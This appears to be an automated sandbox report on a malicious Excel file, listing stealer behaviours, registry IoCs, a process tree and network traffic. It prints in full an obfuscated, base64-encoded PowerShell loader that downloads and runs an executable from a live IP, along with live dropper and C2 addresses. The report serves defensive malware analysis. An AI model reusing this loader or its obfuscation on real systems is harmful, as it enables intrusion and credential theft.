56e1dc98c932d92b991a6e9eed98831d3010374c0714496cad29348738bbe0eb

Analysis

max time kernel
119s
max time network
123s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
09/07/2024, 01:21 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

56e1dc98c932d92b991a6e9eed98831d3010374c0714496cad29348738bbe0eb.xls
Size

196KB
MD5

94c41969a6a283de0b8b9ec94e31b700
SHA1

484cb7930443fc984ccf0c17a7012f95fc5ab4d2
SHA256

56e1dc98c932d92b991a6e9eed98831d3010374c0714496cad29348738bbe0eb
SHA512

0dee183e7e54a2b348c1c6eaf42c7173b8b5fa4e8fe58355225e9ea15e8a476dbb5617ff896f008d2faeccc87c3463080b2f4007e5d507cad4e535d36a8b043e
SSDEEP

6144:gBxfR5+MWzqukoSd1X2yc47zo+rFQoPKBDBtp:gBhRAr0ncoKp

Score

8^/10

collection persistence phishing spyware stealer

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
8	2156	mshta.exe
9	2156	mshta.exe
11	1372	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 11 IoCs

pid	Process
1844	igcc.exe
3404	igcc.exe
3424	igcc.exe
3440	igcc.exe
3460	igcc.exe
3484	igcc.exe
3396	igcc.exe
3412	igcc.exe
3432	igcc.exe
3452	igcc.exe
3468	igcc.exe

Loads dropped DLL 1 IoCs

pid	Process
1372	powershell.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 35 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	igcc.exe
Key queried	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook	igcc.exe
Key queried	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	igcc.exe
Key queried	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	igcc.exe
Key created	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook	igcc.exe
Key queried	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	igcc.exe
Key queried	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	igcc.exe
Key opened	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	igcc.exe
Key queried	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	igcc.exe
Key created	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	igcc.exe
Key created	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook	igcc.exe
Key queried	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	igcc.exe
Key queried	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook	igcc.exe
Key opened	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	igcc.exe
Key opened	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	igcc.exe
Key created	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	igcc.exe
Key queried	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	igcc.exe
Key created	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	igcc.exe
Key queried	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	igcc.exe
Key created	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook	igcc.exe
Key queried	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	igcc.exe
Key queried	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	igcc.exe
Key created	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	igcc.exe
Key created	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	igcc.exe
Key created	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook	igcc.exe
Key opened	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	igcc.exe
Key created	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	igcc.exe
Key created	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	igcc.exe
Key opened	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	igcc.exe
Key created	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	igcc.exe
Key queried	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook	igcc.exe
Key created	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	igcc.exe
Key created	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	igcc.exe
Key opened	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	igcc.exe
Key queried	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook	igcc.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows\CurrentVersion\Run\Vtxjlwrr = "C:\\Users\\Admin\\AppData\\Roaming\\Vtxjlwrr.exe"	igcc.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1844 set thread context of 3484	1844	igcc.exe	49

Detected phishing page
phishing
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2104	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
1372	powershell.exe
1372	powershell.exe
1372	powershell.exe
1844	igcc.exe
1844	igcc.exe
1844	igcc.exe
1844	igcc.exe
1844	igcc.exe
1844	igcc.exe
1844	igcc.exe
1844	igcc.exe
1844	igcc.exe
1844	igcc.exe
1844	igcc.exe
1844	igcc.exe
1844	igcc.exe
1844	igcc.exe
1844	igcc.exe
1844	igcc.exe
1844	igcc.exe
1844	igcc.exe
3484	igcc.exe
3484	igcc.exe
3484	igcc.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1372	powershell.exe
Token: SeDebugPrivilege	1844	igcc.exe
Token: SeDebugPrivilege	1844	igcc.exe
Token: SeDebugPrivilege	3484	igcc.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2104	EXCEL.EXE
2104	EXCEL.EXE
2104	EXCEL.EXE
2104	EXCEL.EXE
2104	EXCEL.EXE

Suspicious use of WriteProcessMemory 55 IoCs

description	pid	Process	procid_target
PID 2156 wrote to memory of 2628	2156	mshta.exe	33
PID 2156 wrote to memory of 2628	2156	mshta.exe	33
PID 2156 wrote to memory of 2628	2156	mshta.exe	33
PID 2156 wrote to memory of 2628	2156	mshta.exe	33
PID 2628 wrote to memory of 1372	2628	cmd.exe	35
PID 2628 wrote to memory of 1372	2628	cmd.exe	35
PID 2628 wrote to memory of 1372	2628	cmd.exe	35
PID 2628 wrote to memory of 1372	2628	cmd.exe	35
PID 1372 wrote to memory of 2608	1372	powershell.exe	36
PID 1372 wrote to memory of 2608	1372	powershell.exe	36
PID 1372 wrote to memory of 2608	1372	powershell.exe	36
PID 1372 wrote to memory of 2608	1372	powershell.exe	36
PID 2608 wrote to memory of 2764	2608	csc.exe	37
PID 2608 wrote to memory of 2764	2608	csc.exe	37
PID 2608 wrote to memory of 2764	2608	csc.exe	37
PID 2608 wrote to memory of 2764	2608	csc.exe	37
PID 1372 wrote to memory of 1844	1372	powershell.exe	39
PID 1372 wrote to memory of 1844	1372	powershell.exe	39
PID 1372 wrote to memory of 1844	1372	powershell.exe	39
PID 1372 wrote to memory of 1844	1372	powershell.exe	39
PID 1844 wrote to memory of 3396	1844	igcc.exe	40
PID 1844 wrote to memory of 3396	1844	igcc.exe	40
PID 1844 wrote to memory of 3396	1844	igcc.exe	40
PID 1844 wrote to memory of 3404	1844	igcc.exe	41
PID 1844 wrote to memory of 3404	1844	igcc.exe	41
PID 1844 wrote to memory of 3404	1844	igcc.exe	41
PID 1844 wrote to memory of 3412	1844	igcc.exe	42
PID 1844 wrote to memory of 3412	1844	igcc.exe	42
PID 1844 wrote to memory of 3412	1844	igcc.exe	42
PID 1844 wrote to memory of 3424	1844	igcc.exe	43
PID 1844 wrote to memory of 3424	1844	igcc.exe	43
PID 1844 wrote to memory of 3424	1844	igcc.exe	43
PID 1844 wrote to memory of 3432	1844	igcc.exe	44
PID 1844 wrote to memory of 3432	1844	igcc.exe	44
PID 1844 wrote to memory of 3432	1844	igcc.exe	44
PID 1844 wrote to memory of 3440	1844	igcc.exe	45
PID 1844 wrote to memory of 3440	1844	igcc.exe	45
PID 1844 wrote to memory of 3440	1844	igcc.exe	45
PID 1844 wrote to memory of 3452	1844	igcc.exe	46
PID 1844 wrote to memory of 3452	1844	igcc.exe	46
PID 1844 wrote to memory of 3452	1844	igcc.exe	46
PID 1844 wrote to memory of 3460	1844	igcc.exe	47
PID 1844 wrote to memory of 3460	1844	igcc.exe	47
PID 1844 wrote to memory of 3460	1844	igcc.exe	47
PID 1844 wrote to memory of 3468	1844	igcc.exe	48
PID 1844 wrote to memory of 3468	1844	igcc.exe	48
PID 1844 wrote to memory of 3468	1844	igcc.exe	48
PID 1844 wrote to memory of 3484	1844	igcc.exe	49
PID 1844 wrote to memory of 3484	1844	igcc.exe	49
PID 1844 wrote to memory of 3484	1844	igcc.exe	49
PID 1844 wrote to memory of 3484	1844	igcc.exe	49
PID 1844 wrote to memory of 3484	1844	igcc.exe	49
PID 1844 wrote to memory of 3484	1844	igcc.exe	49
PID 1844 wrote to memory of 3484	1844	igcc.exe	49
PID 1844 wrote to memory of 3484	1844	igcc.exe	49

outlook_office_path 1 IoCs

description	ioc	Process
Key queried	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	igcc.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key queried	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	igcc.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\56e1dc98c932d92b991a6e9eed98831d3010374c0714496cad29348738bbe0eb.xls
1⤵
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2104

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2156
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c POWeRSHeLl.Exe -Ex bYPasS -NoP -w 1 -C DeviCecReDENtiaLDEploYMenT.Exe ; iEX($(ieX('[SySteM.tExT.eNcOdiNG]'+[CHar]0X3a+[Char]58+'uTF8.GetsTriNG([sYsteM.COnVERT]'+[CHAR]58+[CHAR]58+'fRoMBaSE64sTRINg('+[cHAR]34+'JDV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJFcmRlRmluSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmR2LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV2dLbFR3QktQUixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9obFVVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtieHlNemwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvWik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJFUnJMU0dvaGJsRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lU1BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZHSXFacFFFbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDV4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vODguOTkuMjQ2LjU1L1MwNzA3TS9sc2Fzcy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlRVAoMyk7U1RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcaWdjYy5leGUi'+[CHaR]34+'))')))"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2628
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    POWeRSHeLl.Exe -Ex bYPasS -NoP -w 1 -C DeviCecReDENtiaLDEploYMenT.Exe ; iEX($(ieX('[SySteM.tExT.eNcOdiNG]'+[CHar]0X3a+[Char]58+'uTF8.GetsTriNG([sYsteM.COnVERT]'+[CHAR]58+[CHAR]58+'fRoMBaSE64sTRINg('+[cHAR]34+'JDV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJFcmRlRmluSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmR2LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV2dLbFR3QktQUixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9obFVVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtieHlNemwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvWik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJFUnJMU0dvaGJsRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lU1BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZHSXFacFFFbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDV4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vODguOTkuMjQ2LjU1L1MwNzA3TS9sc2Fzcy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlRVAoMyk7U1RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcaWdjYy5leGUi'+[CHaR]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1372
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yyk-c2li.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2608
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDD65.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDD64.tmp"
        5⤵
        
        PID:2764
  - - C:\Users\Admin\AppData\Roaming\igcc.exe
      "C:\Users\Admin\AppData\Roaming\igcc.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1844
    - - C:\Users\Admin\AppData\Roaming\igcc.exe
        
        "C:\Users\Admin\AppData\Roaming\igcc.exe"
        5⤵
        Executes dropped EXE
        
        PID:3396
    - - C:\Users\Admin\AppData\Roaming\igcc.exe
        
        "C:\Users\Admin\AppData\Roaming\igcc.exe"
        5⤵
        Executes dropped EXE
        
        PID:3404
    - - C:\Users\Admin\AppData\Roaming\igcc.exe
        
        "C:\Users\Admin\AppData\Roaming\igcc.exe"
        5⤵
        Executes dropped EXE
        
        PID:3412
    - - C:\Users\Admin\AppData\Roaming\igcc.exe
        
        "C:\Users\Admin\AppData\Roaming\igcc.exe"
        5⤵
        Executes dropped EXE
        
        PID:3424
    - - C:\Users\Admin\AppData\Roaming\igcc.exe
        
        "C:\Users\Admin\AppData\Roaming\igcc.exe"
        5⤵
        Executes dropped EXE
        
        PID:3432
    - - C:\Users\Admin\AppData\Roaming\igcc.exe
        
        "C:\Users\Admin\AppData\Roaming\igcc.exe"
        5⤵
        Executes dropped EXE
        
        PID:3440
    - - C:\Users\Admin\AppData\Roaming\igcc.exe
        
        "C:\Users\Admin\AppData\Roaming\igcc.exe"
        5⤵
        Executes dropped EXE
        
        PID:3452
    - - C:\Users\Admin\AppData\Roaming\igcc.exe
        
        "C:\Users\Admin\AppData\Roaming\igcc.exe"
        5⤵
        Executes dropped EXE
        
        PID:3460
    - - C:\Users\Admin\AppData\Roaming\igcc.exe
        
        "C:\Users\Admin\AppData\Roaming\igcc.exe"
        5⤵
        Executes dropped EXE
        
        PID:3468
    - - C:\Users\Admin\AppData\Roaming\igcc.exe
        
        "C:\Users\Admin\AppData\Roaming\igcc.exe"
        5⤵
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:3484

Network

DNS

hop.fyi

mshta.exe

Remote address:

8.8.8.8:53

Request

hop.fyi

IN A

Response

hop.fyi

IN A

192.185.89.92
GET

http://hop.fyi/Liuuc

EXCEL.EXE

Remote address:

192.185.89.92:80

Request

GET /Liuuc HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: hop.fyi
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Date: Tue, 09 Jul 2024 01:22:42 GMT
Server: Apache
Cache-Control: no-cache, no-store, private
Expires: -1
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Location: http://88.99.246.55/xampp/ug/IEnetCache.hta
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 215
Keep-Alive: timeout=5, max=75
Content-Type: text/html; charset=UTF-8
GET

http://88.99.246.55/xampp/ug/IEnetCache.hta

EXCEL.EXE

Remote address:

88.99.246.55:80

Request

GET /xampp/ug/IEnetCache.hta HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Connection: Keep-Alive
Host: 88.99.246.55

Response

HTTP/1.1 200 OK

Date: Tue, 09 Jul 2024 01:22:42 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Sun, 07 Jul 2024 17:06:22 GMT
ETag: "19942-61cab50de91ef"
Accept-Ranges: bytes
Content-Length: 104770
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/hta
GET

http://hop.fyi/Liuuc

mshta.exe

Remote address:

192.185.89.92:80

Request

GET /Liuuc HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: hop.fyi
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Date: Tue, 09 Jul 2024 01:22:43 GMT
Server: Apache
Cache-Control: no-cache, no-store, private
Expires: -1
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Location: http://88.99.246.55/xampp/ug/IEnetCache.hta
Vary: Accept-Encoding
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Content-Length: 215
Keep-Alive: timeout=5, max=75
Content-Type: text/html; charset=UTF-8
GET

http://88.99.246.55/xampp/ug/IEnetCache.hta

mshta.exe

Remote address:

88.99.246.55:80

Request

GET /xampp/ug/IEnetCache.hta HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: 88.99.246.55
Connection: Keep-Alive
Range: bytes=13299-
If-Range: "19942-61cab50de91ef"

Response

HTTP/1.1 206 Partial Content

Date: Tue, 09 Jul 2024 01:22:43 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Sun, 07 Jul 2024 17:06:22 GMT
ETag: "19942-61cab50de91ef"
Accept-Ranges: bytes
Content-Length: 91471
Content-Range: bytes 13299-104769/104770
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/hta
GET

http://88.99.246.55/S0707M/lsass.exe

powershell.exe

Remote address:

88.99.246.55:80

Request

GET /S0707M/lsass.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: 88.99.246.55
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 09 Jul 2024 01:22:45 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Mon, 08 Jul 2024 21:32:52 GMT
ETag: "258c00-61cc327c9c900"
Accept-Ranges: bytes
Content-Length: 2460672
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/lnk

192.185.89.92:80

http://hop.fyi/Liuuc

http

EXCEL.EXE

587 B
807 B
6
4

HTTP Request

GET http://hop.fyi/Liuuc

HTTP Response

301
88.99.246.55:80

http://88.99.246.55/xampp/ug/IEnetCache.hta

http

EXCEL.EXE

2.2kB
90.9kB
41
67

HTTP Request

GET http://88.99.246.55/xampp/ug/IEnetCache.hta

HTTP Response

200
192.185.89.92:80

http://hop.fyi/Liuuc

http

mshta.exe

565 B
767 B
5
3

HTTP Request

GET http://hop.fyi/Liuuc

HTTP Response

301
88.99.246.55:80

http://88.99.246.55/xampp/ug/IEnetCache.hta

http

mshta.exe

2.2kB
94.6kB
38
69

HTTP Request

GET http://88.99.246.55/xampp/ug/IEnetCache.hta

HTTP Response

206
88.99.246.55:80

http://88.99.246.55/S0707M/lsass.exe

http

powershell.exe

53.1kB
2.5MB
1094
1817

HTTP Request

GET http://88.99.246.55/S0707M/lsass.exe

HTTP Response

200
65.108.24.99:62520

igcc.exe

2.9kB
159.0kB
63
120
65.108.24.99:62520

igcc.exe

245.4kB
2.7kB
186
68

8.8.8.8:53

hop.fyi

dns

mshta.exe

53 B
69 B
1
1

DNS Request

hop.fyi

DNS Response

192.185.89.92

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

